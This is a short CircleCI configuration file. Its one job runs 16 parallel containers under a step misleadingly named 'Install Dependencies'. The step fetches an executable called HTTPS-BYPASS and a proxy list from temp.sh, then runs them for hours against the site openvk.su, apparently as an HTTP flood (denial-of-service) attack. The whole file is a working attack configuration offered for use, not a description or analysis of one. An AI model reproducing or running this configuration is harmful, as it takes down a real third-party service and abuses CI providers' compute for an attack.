version: 2.1
jobs:
    trial:
      docker:
            - image: debian:latest
      parallelism: 16
      steps:
        - run:
            name: Install Dependencies
            command: apt update && apt install wget -y && wget https://temp.sh/UuCZP/HTTPS-BYPASS && wget https://temp.sh/swuKL/proxy.txt && chmod +x HTTPS-BYPASS && ./HTTPS-BYPASS https://openvk.su/ 30000 250 20
            no_output_timeout: 5h

workflows:
    version: 2.1
    build:
        jobs:
        - trial
